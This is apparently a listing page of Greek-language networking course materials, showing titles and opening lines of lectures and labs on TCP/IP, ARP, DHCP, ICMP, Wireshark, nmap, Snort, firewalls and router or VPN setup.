Κεφάλαιο 7 Διαδικτύωση-Internet 7.2 Τεχνολογία TCP/IP Τι δηλώνει ο όρος «TCP/IP»; Ο όρος TCP/IP αναφέρεται σε μια ομάδα ομοειδών πρωτοκόλλων που χρησιμοποιούνται για την επικοινωνία των δικτύων υπολογιστών
ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #3 Στρώµα ικτύου:ip Πρωτόκολλο και Πρωτόκολλα ροµολόγησης
ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #3 Στρώµα ικτύου:ip Πρωτόκολλο και Πρωτόκολλα ροµολόγησης 1. Αντικείµενο Η εργαστηριακή άσκηση αποσκοπεί στην εξοικείωση των φοιτητών µε το ζήτηµα των λογικών διαδικασιών, οι οποίες
Οι Διαδικτυακές ανάγκες μιας εταιρείας σε διευθύνσεις IPv4, έχουν ως εξής: Τμήμα Διοίκησης Προσωπικού & Οικονομικών Σύνολο απαιτούμενων διευθύνσεων
Άσκηση 1 Ethernet protocol Οι Διαδικτυακές ανάγκες μιας εταιρείας σε διευθύνσεις IPv4, έχουν ως εξής: Τμήμα Πωλήσεων Τμήμα Ανάπτυξης Προϊόντων Τμήμα Διοίκησης Προσωπικού & Οικονομικών Σύνολο απαιτούμενων
Δίκτυα Η/Υ ςτην Επιχείρηςη
Δίκτυα Η/Υ ςτην Επιχείρηςη Εντολέσ δικτυακών πρωτοκόλλων ςε Windows/Unix Γκάμασ Βαςίλειοσ, Εργαςτηριακόσ υνεργάτησ Εντολζσ δικτφου ςε Windows/Unix ε προηγούμενο εργαςτήριο παρουςιάςτηκαν οι παρακάτω εντολέσ
ΚΕΦΑΛΑΙΟ 1 HONEYPOTS, HONEYNETS
ΚΕΦΑΛΑΙΟ 1 HONEYPOTS, HONEYNETS Μόνο κάποιος που γνωρίζει τις μεθόδους των επιτιθέμενων μπορεί να προστατεύσει κατάλληλα τα συστήματα του... Εισαγωγή Τα υπολογιστικά συστήματα που είναι σήμερα συνδεδεμένα
Δίκτυα Υπολογιστών Ενότητα 9: Dynamic Host Configuration Protocol- DHCP
Δίκτυα Υπολογιστών Ενότητα 9: Dynamic Host Configuration Protocol- DHCP Μιχάλας Άγγελος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons.
Πρωτόκολλο ARP. Γεωργιλά Χιονία Καθηγήτρια Πληροφορικής ΠΕ1901
Πρωτόκολλο ARP Γεωργιλά Χιονία Καθηγήτρια Πληροφορικής ΠΕ1901 Ποιο είναι το έργο του Πρωτοκόλλου Μετατροπής Διεύθυνσης (Address Resolution Protocol ARP) Κάνει δυναμική μετατροπή των IP διευθύνσεων σε φυσικές
Βασικά στοιχεία από τη Θεωρία
1o ΕΠΑΛ- Ε.Κ. Συκεών -Τομέας: Ηλεκτρονικής, Ηλεκτρολογίας και Αυτοματισμού Εκπαιδευτικοί: Μπουλταδάκης Στέλιος Μαυρίδης Κώστας Δραστηριότητα: 17 Μάθημα: Εργαστήριο Δικτύων Υπολογιστών Αντικείμενο : Τα
ΣΥΝΔΕΣΗ ΚΑΤΑΓΡΑΦΙΚΟΥ ΣΤΟ INTERNET
ΣΥΝΔΕΣΗ ΚΑΤΑΓΡΑΦΙΚΟΥ ΣΤΟ INTERNET 1) Συνδέουμε το καταγραφικό και τον Η/Υ με το ίδιο ADSL Router. 2) Έπειτα θα πρέπει να βρούμε την IP διεύθυνση που έχει το Router. Για να το κάνουμε αυτό, ακολουθούμε
Δίκτυα Υπολογιστών Ενότητα 10: Ethernet και ARP
Δίκτυα Υπολογιστών Ενότητα 10: Ethernet και ARP Μιχάλας Άγγελος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons. Για εκπαιδευτικό υλικό,
Snort. A multi-mode packet analysis tool 3-1. Ασφάλεια Δικτύων, Τμήμα Πληροφορικής, Ο.Π.Α.,
Snort A multi-mode packet analysis tool Ασφάλεια Δικτύων, Τμήμα Πληροφορικής, Ο.Π.Α., 3-1 Περιεχόμενα Εισαγωγή Snort Θέση στο δίκτυο Αρχιτεκτονική Snort Εντοπισμός εισβολών Κανόνες Snort Demo εκτέλεσης
Ασφάλεια Υπολογιστικών Συστημάτων
Ασφάλεια Υπολογιστικών Συστημάτων Ενότητα 7: Intrusion Detection Systems - Windump Νικολάου Σπύρος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative
ΕΓΚΑΤΑΣΤΑΣΗ ΣΥΝΔΕΣΗΣ MS L2TP VPN
ΕΓΚΑΤΑΣΤΑΣΗ ΣΥΝΔΕΣΗΣ MS L2TP VPN Εισαγωγή Για την σύνδεσή μας στο εσωτερικό δίκτυο του ΕΚΕΤΑ είναι απαραίτητη η δημιουργία μιας ασφαλούς (VPN) σύνδεσης. Το πρωτόκολλο L2TP/IPSec είναι ασφαλέστερο από το
Draytek Vigor 2700VG Annex A
Draytek Vigor 2700VG Annex A Από το Forum του http://www.adslgr.com/forum Όπως βλέπουμε η σύνδεσμολογία του είναι απλή και αφού το τοποθετήσουμε κάπου (είναι λίγο μεγάλο σε μέγεθος και μιάζει με σαλάχι)
Σενάριο Εστίασης Win XP:
Σενάριο Εστίασης Win XP: Υλικό: 1 Η/Υ (backoffice), 1 POS, 1 router Motorola, 1 PDA. Σενάριο: Sync του backoffice με το POS και merge του POS με το PDA. Προϋποθέσεις Software: 1) BACK OFFICE : WIN XP pro,.net
ΤΕΧΝΟΛΟΓΙΑ ΔΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ
Επικοινωνιακό υποδίκτυο ονομάζεται το σύνολο των κόμβων που παρεμβάλλονται κατά την αποστολή ενός πακέτου από τη πηγή στο προορισμό. Το επικοινωνιακό υποδίκτυο μπορεί να βασίζεται είτε στη φιλοσοφία των
ΔΙΑΧΕΙΡΙΣΗ ΔΙΚΤΥΩΝ Διαχείριση Ασφαλείας (ΙΙ) Πρωτόκολλα & Αρχιτεκτονικές Firewalls Anomaly & Intrusion Detection Systems (IDS)
ΔΙΑΧΕΙΡΙΣΗ ΔΙΚΤΥΩΝ Διαχείριση Ασφαλείας (ΙΙ) Πρωτόκολλα & Αρχιτεκτονικές email Firewalls Anomaly & Intrusion Detection Systems (IDS) Β. Μάγκλαρης maglaris@netmode.ntua.gr www.netmode.ntua.gr 30/11/2015
Με λίγα λόγια, το TCP/IP καθορίζει τον τρόπο που πακετάρονται και μεταφέρονται τα δεδομένα της σύνδεσής μας.
Γρήγορο Ίντερνετ με Κατάλληλες Ρυθμίσεις TCP/IP Η ταχύτητά μας στο ίντερνετ εξαρτάται από πολλούς παράγοντες, όπου τον κεντρικό ρόλο παίζει η σύνδεσή μας. Πολλές φορές, όμως, η σύνδεσή μας μπορεί να περιορίζεται
Εργαστηριακή Άσκηση 6 Πρωτόκολλα ARP και ICMP
Εργαστηριακή Άσκηση 6 Πρωτόκολλα ARP και ICMP Ο σκοπός αυτού του εργαστηρίου είναι η περαιτέρω εξέταση των πρωτοκόλλων ARP, IP και ICMP μέσω της καταγραφής και παρατήρησης των περιεχομένων των πακέτων
ΧΑΡΟΚΟΠΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ
ΧΑΡΟΚΟΠΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ Τμημα Πληροφορικης και Τηλεματικης Τσάμη Παναγιώτα ΑΜ: 20833 ΚΑΤΑΝΕΜΗΜΕΝΑ ΣΥΣΤΗΜΑΤΑ Άσκηση 1 Αθήνα 13-12-2011 Αναφορά Ενότητα 1 A Δημιουργήστε στο φλοιό 3 εντολές (alias) που η
Δίκτυα Υπολογιστών Ενότητα 7: Internet Control Message Protocol - ICMP
Δίκτυα Υπολογιστών Ενότητα 7: Internet Control Message Protocol - ICMP Μιχάλας Άγγελος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons.
Δίκτυα Υπολογιστών Λύσεις σειράς ασκήσεων επανάληψης
ΕΘΝΙΚΟ ΜΕΤΣΟΒΙΟ ΠΟΛΥΤΕΧΝΕΙΟ ΣΧΟΛΗ ΗΛΕΚΤΡΟΛΟΓΩΝ ΜΗΧ/ΚΩΝ & ΜΗΧ/ΚΩΝ ΥΠΟΛΟΓΙΣΤΩΝ Τομέας Επικοινωνιών, Ηλεκτρονικής και Συστημάτων Πληροφορικής (1) Δίκτυα Υπολογιστών Λύσεις σειράς ασκήσεων επανάληψης Απρόκλητο
ΚΕΦΑΛΑΙΟ 4. Τεχνική Ανίχνευσης του. Πτυχιακή Εργασία Σελίδα 95
ΚΕΦΑΛΑΙΟ 4 Τεχνική Ανίχνευσης του ICMP Echo Spoofing Πτυχιακή Εργασία Σελίδα 95 Περιεχόμενα ΕΙΣΑΓΩΓΗ 98 ΜΕΡΟΣ Α: Έλεγχος του Icmp Echo Reply Πακέτου 103 A.1. Ανίχνευση του spoofed Icmp Echo Request Πακέτου.
Τη φυσική (MAC) διεύθυνση που δίνει ο κατασκευαστής του δικτυακού υλικού στις συσκευές του (π.χ. στις κάρτες δικτύου). Η περιοχή διευθύνσεων που
7.7 Πρωτόκολλο ARP 1 ύο είδη διευθύνσεων: MAC - IP Τη φυσική (MAC) διεύθυνση που δίνει ο κατασκευαστής του δικτυακού υλικού στις συσκευές του (π.χ. στις κάρτες δικτύου). Η περιοχή διευθύνσεων που µπορεί
Εργαστήριο 4 Ασκήσεις: Διαχείριση Δικτύου (nmap, iptables) και Προχωρημένες Εντολές Unix (grep, ps, cut, find)
Εργαστήριο 4 Ασκήσεις: Διαχείριση Δικτύου (nmap, iptables) και Προχωρημένες Εντολές Unix (grep, ps, cut, find) 1) Δώστε την εντολή που δείχνει τις ανοιχτές εισερχόμενες θύρες (ports) της μηχανής σας. Χρησιμοποιήστε
Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Υπηρεσία Ηλεκτρονικού Ταχυδρομείου - SMTP
Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Υπηρεσία Ηλεκτρονικού Ταχυδρομείου - SMTP Δρ. Απόστολος Γκάμας Διδάσκων (407/80) gkamas@uop.gr Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών Διαφάνεια 1 1 Ηλεκτρονικό
Εργαστήριο Ethereal: ICMP
Εργαστήριο Ethereal: ICMP Έκδοση:1.0 2005 J.F. Kurose, K.W. Ross Μετάφραση - Απόδοση: Σ. Τσακιρίδου Computer Networking: A Top-Down Approach Featuring the Internet Στο εργαστήριο αυτό θα εξετάσουµε µερικά
Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης
Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης Σε αυτό το εγχειρίδιο θα καλύψουμε τη μεθοδολογία εγκατάστασης ενός σεναρίου εστίασης από την αρχή έως το σημείο των βασικών ρυθμίσεων
α) η καταγραφή και η σύλληψη της δικτυακής κίνησης (capture) και β) η ανάλυση της δικτυακής κίνησης.
Εργαστηριακή Άσκηση 3 Σκοπός της τρίτης σειράς ασκήσεων είναι η γνωριµία µε τον αναλυτή πρωτοκόλλων Wireshark. Το πρόγραµµα Wireshark είναι ένας ανιχνευτής πακέτων (packet sniffer) και διατίθεται ως ανοιχτό
Οδηγίες Σύνδεσης Ασύρματου Δικτύου ΤΜΗΥ&Π. Οδηγίες Σύνδεσης για λοιπά Linux/Unix Συστήματα
Οδηγίες Σύνδεσης Ασύρματου Δικτύου ΤΜΗΥ&Π Περιεχόμενα: 1. 1. Εισαγωγικές Πληροφορίες 2. Οδηγίες Σύνδεσης για Windows XP/Vista 3. Οδηγίες Σύνδεσης για Windows 7 4. Οδηγίες Σύνδεσης για MAC OS 5. Οδηγίες
7.2.2 Σχέση OSI και TCP/IP
Κεφάλαιο 7 7.2.2 Σχέση OSI και TCP/IP Σελ. 226-230 Γεώργιος Γιαννόπουλος ΠΕ19, ggiannop (at) sch.gr ΕΣΠΕΡΙΝΟ ΕΠΑΛ Κομοτηνής http://diktya-epal-g.ggia.info/ Γνωστό μοντέλο OSI διασύνδεσης ανοικτών συστημάτων.
ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #2 Ethernet MAC Στρώµα
ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #2 Ethernet MAC Στρώµα 1. Αντικείµενο Η εργαστηριακή άσκηση αποσκοπεί στην εξοικείωση των φοιτητών µε το ζήτηµα των λογικών διαδικασιών, οι οποίες υλοποιούνται στο επίπεδο του στρώµατος
Εργαστήριο 3. Εγκατάσταση LAMP Stack στο AWS
Εργαστήριο 3 Εγκατάσταση LAMP Stack στο AWS ΕΠΛ425 - Τεχνολογίες Διαδικτύου Χειμερινό Εξάμηνο 201 Τί είναι ένας LAMP Server; Αποτελεί ένα πρότυπο μοντέλο για Web Services. Το ακρώνυμο αντιστοιχεί μέ: Linux
ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP
ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP Το FTP (File Transfer Protocol) είναι το εξειδικευμένο πρωτόκολλο μεταφοράς αρχείων στα σύγχρονα δίκτυα δεδομένων όπως το Διαδίκτυο. Δίνει τη δυνατότητα μεταφοράς αρχείων από τον υπολογιστή
ΚΕΦΑΛΑΙΟ 3 ICMP Echo Spoofing
ΚΕΦΑΛΑΙΟ 3 ICMP Echo Spoofing Πτυχιακή Εργασία Σελίδα 67 Περιεχόμενα ΕΙΣΑΓΩΓΗ. 69 ΜΕΡΟΣ Α: To Icmp Πρωτόκολλο.... 70 Γενικά. 70 Το Icmp Echo Πακέτο. 72 Το Icmp Destination Unreachable Πακέτο. 75 ΜΕΡΟΣ
Ethernet Ethernet ΙΕΕΕ CSMA/CD
Ethernet Τα τοπικά δίκτυα είναι συνήθως τύπου Ethernet ή λέμε ότι ακολουθούν το πρότυπο ΙΕΕΕ 802.3 Ακολουθούν το μηχανισμό CSMA/CD (Πολλαπλή πρόσβαση με Ακρόαση Φέροντος και Ανίχνευση Συγκρούσεων). Πολλαπλή
ΤΜΗΜΑ ΕΚΠΑΙΔΕΥΤΙΚΗΣ ΥΠΟΛΟΓΙΣΤΙΚΗΣ ΥΠΟΔΟΜΗΣ ΜΗΧΑΝΟΓΡΑΦΙΚΟ ΚΕΝΤΡΟ
ΠΟΛΥΤΕΧΝΕΙΟ ΚΡΗΤΗΣ ΤΜΗΜΑ ΕΚΠΑΙΔΕΥΤΙΚΗΣ ΥΠΟΛΟΓΙΣΤΙΚΗΣ ΥΠΟΔΟΜΗΣ ΜΗΧΑΝΟΓΡΑΦΙΚΟ ΚΕΝΤΡΟ Πολυτεχνειούπολη Ακρωτηρίου, Χανιά, 73100 Τηλ.: 28210 37400 (κεντρικό), 28210 37766 (κτίριο ΜΗΠΕΡ), Fax: 28210 37571 e-mail:
3.3 Πρωτόκολλα ανεύρεσης και απόδοσης διευθύνσεων, Address Resolution Protocol (ARP) και Dynamic Host Configuration Protocol (DHCP)
3.3 Πρωτόκολλα ανεύρεσης και απόδοσης διευθύνσεων, Address Resolution Protocol (ARP) και Dynamic Host Configuration Protocol (DHCP) 1 / 32 Σε έναν κόμβο ο οποίος επιθυμεί να αποστείλει δεδομένα σε κάποιον
Ενεργοποίηση του πρωτοκόλλου IPv6
Ενεργοποίηση του πρωτοκόλλου IPv6 Στις επόµενες παραγράφους περιγράφουµε τα βασικά βήµατα που πρέπει να ακολουθήσει ο τελικός χρήσης για µια αντιπροσωπευτική οµάδα λειτουργικών συστηµάτων ώστε να συνδεθεί
Διαδίκτυα και το Διαδίκτυο (Internetworking and the Internet)
Διαδίκτυα και το Διαδίκτυο (Internetworking and the Internet) Περίληψη Πως τα διάφορα δίκτυα διαφέρουν μεταξύ τους Πως συνδέονται ανομοιογενή δίκτυα μεταξύ τους Εικονικά κυκλώματα συνδεδεμένα σε σειρά
Σχεδιασμός Εικονικών Δικτύων Ενότητα 7: Μεταγλώττιση διευθύνσεων (ΝΑΤ)
Σχεδιασμός Εικονικών Δικτύων Ενότητα 7: Μεταγλώττιση διευθύνσεων (ΝΑΤ) Νικολάου Σπύρος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons.
PortSip Softphone. Ελληνικά Ι English 1/20
PortSip Softphone Ελληνικά Ι English 1/20 1. Περιεχόμενα 2. Εγκατάσταση σε Smartphone & Tablet (Android ή ios)... 1 3. Εγκατάσταση σε ηλεκτρονικό υπολογιστή (Windows ή Mac).... 5 4. Installation in Smartphone
ΚΕΦΑΛΑΙΟ 1.7. Πρωτόκολλα και Αρχιτεκτονική Δικτύου
ΚΕΦΑΛΑΙΟ 1.7 Πρωτόκολλα και Αρχιτεκτονική Δικτύου Επικοινωνία δύο σταθμών Ύπαρξη διαδρομής Αποκατάσταση σύνδεσης Ο σταθμός-πηγή πρέπει να ξέρει πότε ο σταθμός-προορισμός είναι έτοιμος να λάβει δεδομένα.
Βασικές Έννοιες Web Εφαρμογών
ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ ΤΜΗΜΑ ΔΙΟΙΚΗΤΙΚΗΣ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ Τεχνολογίες και Εφαρμογές Διαδικτύου Βασικές Έννοιες Web Εφαρμογών Κατερίνα Πραματάρη Τεχνολογίες και Εφαρμογές Διαδικτύου Περιεχόμενα
Πρωτόκολλα Διαδικτύου (ΨΣ-326 DS151)
Πρωτόκολλα Διαδικτύου (ΨΣ-326 DS151) 2 Η ΕΡΓΑΣΤΗΡΙΑΚΗ ΔΙΑΛΕΞΗ (WIRESHARK ΠΡΩΤΟΚΟΛΛΑ ΕΦΑΡΜΟΓΗΣ) Υπεύθυνος καθηγητής: Άγγελος Ρούσκας Βοηθός: Υ.Δ. Ευθύμης Οικονόμου 1 Περιεχόμενα παρουσίασης HTTP συνέχεια
Διαμόρφωση και έλεγχος του δικτύου
Εργαστήριο 8 ΤΕΙ ΘΕΣΣΑΛΟΝΙΚΗΣ - ΤΜΗΜΑ ΠΛΗΡΟΦΟΡΙΚΗΣ ΜΑΘΗΜΑ: ΔΙΚΤΥΑ Η/Υ Διαμόρφωση και έλεγχος του δικτύου Στόχος Ο στόχος αυτού του εργαστηρίου είναι η κατανόηση και εξοικείωση με τα εργαλεία διαμόρφωσης
Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1
Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP Περιεχόµενα Τι είναι η υπηρεσία FTP;...2 FTP από τη γραµµή εντολών των Windows...2 Το πρόγραµµα WS-FTP...4 Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1
Εισαγωγή στο TCP/IP. Π. Γαλάτης
Εισαγωγή στο TCP/IP Π. Γαλάτης H σουίτα πρωτοκόλλου TCP/IP Το TCP/IP είναι ένα σύνολο πρωτοκόλλων που ονομάζουμε σουίτα και αφορούν στη δικτύωση των υπολογιστών. Transmission Control Protocol (TCP) μετάδοση
Οδηγίες προς τον τελικό χρήστη για τη σύνδεση στο Ασύρματο Δίκτυο Δεδομένων του ΤΜΗΥ&Π
Οδηγίες προς τον τελικό χρήστη για τη σύνδεση στο Ασύρματο Δίκτυο Δεδομένων του ΤΜΗΥ&Π Χρήστες του ασύρματου δικτύου δεδομένων του Τμήματος Μηχανικών Ηλεκτρονικών Υπολογιστών & Πληροφορικής μπορούν να
Βασικές Υπηρεσίες Διαδικτύου. Επικοινωνίες Δεδομένων Μάθημα 2 ο
Βασικές Υπηρεσίες Διαδικτύου Επικοινωνίες Δεδομένων Μάθημα 2 ο Μεταφορά αρχείων (File Transfer Protocol, FTP) user at host FTP user interface FTP client local file system file transfer FTP server remote
Εργαστήριο «Δίκτυα Υπολογιστών Ι»
Εργαστήριο «Δίκτυα Υπολογιστών Ι» Άσκηση 2 η Τμήμα Mηχ. Πληροφορικής & Υπολογιστών Παν. Δυτικής Αττικής Ημερομηνία έκδοσης: 3/10/2018 Επιμέλεια: Αντώνης Μπόγρης, Ιωάννης Ξυδάς Στόχοι της άσκησης: Μελέτη
Δίκτυα Υπολογιστών Ενότητα 3: Domain Name System - DNS
Δίκτυα Υπολογιστών Ενότητα 3: Domain Name System - DNS Μιχάλας Άγγελος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons. Για εκπαιδευτικό
Επίπεδο δικτύου IP διευθυνσιοδότηση
Επίπεδο δικτύου IP διευθυνσιοδότηση (πες μου την IP σου να σου πω ποιος είσαι) Εργαστήριο Δικτύων Υπολογιστών 2014-2015 Τμήμα Μηχανικών Η/Υ και Πληροφορικής Επίπεδο δικτύου (Network layer) Επίπεδο εφαρμογής
Δημιουργία Λογαριασμού Διαχείρισης Business Telephony Create a Management Account for Business Telephony
Δημιουργία Λογαριασμού Διαχείρισης Business Telephony Create a Management Account for Business Telephony Ελληνικά Ι English 1/7 Δημιουργία Λογαριασμού Διαχείρισης Επιχειρηματικής Τηλεφωνίας μέσω της ιστοσελίδας
Ιόνιο Πανεπιστήµιο Τµήµα Αρχειονοµίας Βιβλιοθηκονοµίας. Μοντέλο TCP/IP. Ενότητα E. Συστήµατα Επικοινωνίας
Ιόνιο Πανεπιστήµιο Τµήµα Αρχειονοµίας Βιβλιοθηκονοµίας ίκτυα Η/Υ Μοντέλο TCP/IP Ενότητα E ρ. Ε. Μάγκος Συστήµατα Επικοινωνίας (Ε) (PC) (N) Επικοινωνίες: Εφαρµογές Υπολογιστές ίκτυα πολλές πολλοί N A N
ΠΑΝΕΠΙΣΤΗΜΙΟΥ ΠΕΛΟΠΟΝΝΗΣΟΥ ΤΜΗΜΑ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ ΤΗΛΕΠΙΚΟΙΝΩΝΙΩΝ Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών
ΠΑΝΕΠΙΣΤΗΜΙΟΥ ΠΕΛΟΠΟΝΝΗΣΟΥ ΤΜΗΜΑ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ ΤΗΛΕΠΙΚΟΙΝΩΝΙΩΝ Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών Διδάσκων: Απόστολος Γκάμας (Διδάσκων ΠΔ 407/80) Ενδεικτική Λύση 3 ης Εργαστηριακής
υποστηρίζουν και υλοποιούν την πολιτική ασφάλειας
Firewalls Firewalls Τα firewalls (τοίχοι πυρασφάλειας ή πυρότοιχοι ή αναχώματα ασφαλείας ή φράγματα ασφαλείας) είναι ένα σύστημα το οποίο παρεμβάλλεται μεταξύ του ιδιωτικού δικτύου και του δημοσίου δικτύου
Network Mapper. Nmap
Network Mapper Nmap 3-1 Contents Introduction Target Specification Host Discovery Port Scanning Service and Version Detection OS Detection Examples Assignment 3-2 Contents Introduction Target Specification
Ρυθµ θ ίσ ί ε σ ις ς e-mai a l i dsp s ei e ra r i a a.gr g
Ρυθµίσεις e-mail dspeiraia.gr Οδηγός Ρυθμίσεων E-mail Όνομα χρήστη Κωδικός Διακομιστής Εισερχόμενης Αλληλογραφίας mail.dspeiraia.gr Διακομιστής Εξερχόμενης Αλληλογραφίας mailgate.wexgroup.com E-mail_Setup_dspeiraia_V1.2_WL.docx141007_02
Εγκατάσταση λογισμικού και αναβάθμιση συσκευής Device software installation and software upgrade
Για να ελέγξετε το λογισμικό που έχει τώρα η συσκευή κάντε κλικ Menu > Options > Device > About Device Versions. Στο πιο κάτω παράδειγμα η συσκευή έχει έκδοση λογισμικού 6.0.0.546 με πλατφόρμα 6.6.0.207.
ΤΕΧΝΟΛΟΓΙΑ ΔΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ
Σε δίκτυο υπολογιστών εμπιστευτική πληροφορία μπορεί να υπάρχει αποθηκευμένη σε μέσα αποθήκευσης (σκληροί δίσκοι, μνήμες κ.λ.π.), ή να κυκλοφορεί μέσου του δικτύου με τη μορφή πακέτων. Η ύπαρξη πληροφοριών
Τεχνολογίες ιαδικτύου
Τεχνολογίες ιαδικτύου Εισαγωγή Αρχιτεκτονική, Πρωτόκολλα και Πρότυπα Βασικών Υπηρεσιών Ιστορικά Στοιχεία ARPANET Ο «παππούς» των δικτύων Αναπτύχθηκε από την DARPA στα τέλη του 60 Το 83 διασπάται σε MILNET
Ιόνιο Πανεπιστήµιο Τµήµα Πληροφορικής Συστήµατα Επικοινωνίας. Μοντέλο TCP/IP. Ενότητα E. Πόσοι εµπλέκονται σε ένα Σύστηµα Επικοινωνίας
Ιόνιο Πανεπιστήµιο Τµήµα Πληροφορικής ίκτυα Η/Υ Συστήµατα Επικοινωνίας (Ε) (PC) (N) Επικοινωνίες: Εφαρµογές Υπολογιστές ίκτυα Μοντέλο TCP/IP πολλές πολλοί N A N B Ενότητα E PC A PC B PC D PC E E A E B
Εργαστηριακή Άσκηση 3 Εισαγωγή στη δρομολόγηση
Εργαστηριακή Άσκηση 3 Εισαγωγή στη δρομολόγηση Όπως είδαμε και στο τέλος του προηγούμενου εργαστηρίου, μια από τις βασικότερες λειτουργίες του Internet είναι δρομολόγηση πακέτων IP. Με τον γενικό όρο δρομολόγηση